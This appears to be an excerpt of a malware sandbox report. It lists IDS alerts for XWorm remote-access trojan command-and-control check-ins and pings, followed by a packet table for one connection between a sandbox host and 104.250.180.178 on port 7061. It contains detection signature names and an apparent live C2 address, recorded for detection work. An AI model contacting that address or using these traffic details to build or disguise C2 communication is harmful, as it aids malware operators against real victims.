2024-10-08T11:30:59.587757+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:59.603334+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:00.618345+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:00.620081+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:03.526304+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:03.528338+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:17.023029+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:20.621639+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:20.623465+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:23.460898+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:23.463295+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:26.710516+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:26.710516+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:31.903118+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:34.402808+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:34.406820+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:34.827674+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:34.829517+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:35.947532+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:35.952320+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:43.704303+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:45.968055+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:46.436477+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:52.502745+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:53.895621+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:53.900759+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:55.117962+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:55.120535+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:56.120320+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:56.122579+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:31:57.245664+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:57.245664+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:57.988851+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:31:57.992389+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:32:03.187760+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:32:05.393102+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:32:05.394984+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:32:14.921943+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:32:14.924364+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:32:23.837337+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:32:23.838122+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:32:25.332473+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:32:25.332473+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	104.250.180.178	7061	192.168.2.5	49763	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 11:28:39.773951054 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:28:39.778896093 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:28:39.778980970 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:28:39.883759022 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:28:39.888631105 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:28:54.417356968 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:28:54.724723101 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:28:55.114511013 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:28:55.114557028 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:28:55.319169044 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:28:55.365262032 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:28:55.597433090 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:28:55.601361990 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:28:55.606430054 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:08.944338083 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:08.949244976 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:09.277703047 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:09.279953003 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:09.284785986 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:23.475379944 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:23.787364006 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:24.396827936 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:24.461180925 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:24.461221933 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:24.461282015 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:24.787452936 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:24.791040897 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:24.796492100 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:25.309226036 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:25.349697113 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:38.006370068 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:38.011760950 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:38.533243895 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:38.535249949 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:38.540138006 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:51.975229025 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:51.980164051 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:51.990852118 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:51.996011972 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:52.021840096 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:52.026712894 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:52.037712097 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:52.042743921 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:52.068677902 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:52.075601101 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:52.084726095 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:52.089741945 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:52.100133896 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:52.105578899 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:52.131256104 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:52.136375904 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:52.308167934 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:52.310916901 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:52.315933943 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:52.318835974 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:52.323847055 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:52.583064079 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:52.584824085 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:52.589718103 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:52.872745037 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:52.874212027 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:52.880971909 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:52.881084919 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:52.886434078 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:53.058732986 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:53.060250998 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:53.065156937 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:55.307665110 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:55.349704981 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:58.365808010 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:58.371140957 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:58.397120953 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:58.402529001 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:58.428343058 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:58.433332920 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:58.553303957 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:58.558828115 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:58.707103968 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:58.708780050 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:58.713726044 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:58.947531939 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:58.949192047 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:58.954183102 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:59.197822094 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:59.199640036 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:59.205188990 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:29:59.207987070 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:29:59.212873936 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:08.740690947 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:08.745781898 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:09.067653894 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:09.069812059 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:09.074670076 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:13.912823915 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:13.917934895 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:13.975123882 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:13.981023073 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:14.247740984 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:14.249438047 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:14.254420042 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:14.487513065 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:14.489379883 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:14.494359970 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:17.240797997 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:17.245685101 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:17.577485085 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:17.580130100 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:17.585067034 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:24.443887949 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:24.448878050 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:24.615798950 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:24.620702982 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:24.769270897 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:24.770766020 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:24.775657892 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:24.775708914 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:24.780620098 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:25.018138885 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:25.022214890 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:25.026995897 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:25.257539988 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:25.268297911 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:25.273500919 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:25.497328043 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:25.553142071 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:39.303468943 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:39.308427095 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:39.540173054 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:39.545084953 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:39.637713909 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:39.640700102 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:39.645610094 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:39.878782988 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:39.883249998 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:39.888092995 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:40.006562948 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:40.011729956 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:40.417562008 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:40.447920084 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:40.452862978 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:40.615721941 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:40.620646000 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:40.647020102 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:40.651880026 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:41.067585945 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:41.072706938 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:41.077594995 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:41.337323904 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:41.342401028 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:41.347275972 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:55.178235054 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:55.183499098 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:55.308300972 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:55.349826097 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:55.597512007 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:55.602359056 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:55.607307911 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:56.287812948 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:56.292690992 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:56.428273916 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:56.433176994 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:56.490829945 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:56.496237040 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:56.852861881 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:56.864166975 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:56.869105101 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:57.131458998 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:57.136256933 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:57.712301016 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:57.717444897 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:57.997953892 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:57.999989033 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:58.004990101 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:58.005043030 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:58.010174036 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:58.365925074 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:58.370886087 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:59.587757111 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:30:59.603333950 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:30:59.608350039 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:00.618345022 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:00.620080948 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:00.625211954 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:03.526304007 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:03.528337955 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:03.534208059 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:12.381516933 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:12.386532068 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:17.023029089 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:17.028985023 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:17.034415007 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:19.946376085 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:19.951986074 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:20.621639013 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:20.623465061 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:20.628453016 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:22.943926096 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:22.949090958 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:23.460897923 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:23.463294983 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:23.468163013 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:26.710515976 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:26.756104946 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:28.475172997 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:28.481389999 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:28.584552050 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:28.589888096 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:31.903117895 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:31.908296108 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:31.913269043 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:33.990780115 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:33.995846033 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:34.402807951 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:34.406820059 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:34.411830902 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:34.827673912 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:34.829516888 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:34.834398985 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:35.600233078 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:35.605192900 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:35.947531939 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:35.952320099 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:35.957134962 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:39.600301027 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:39.605225086 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:40.912795067 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:40.917994022 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:43.704303026 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:43.706425905 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:43.711205959 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:44.209733963 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:44.214653015 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:44.334877968 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:44.613778114 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:44.613852024 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:44.618629932 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:45.968055010 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:45.973002911 CEST	49763	7061	192.168.2.5	104.250.180.178
Oct 8, 2024 11:31:45.977986097 CEST	7061	49763	104.250.180.178	192.168.2.5
Oct 8, 2024 11:31:46.434818029 CEST	7061	49763	104.250.180.178	192.168.2.5
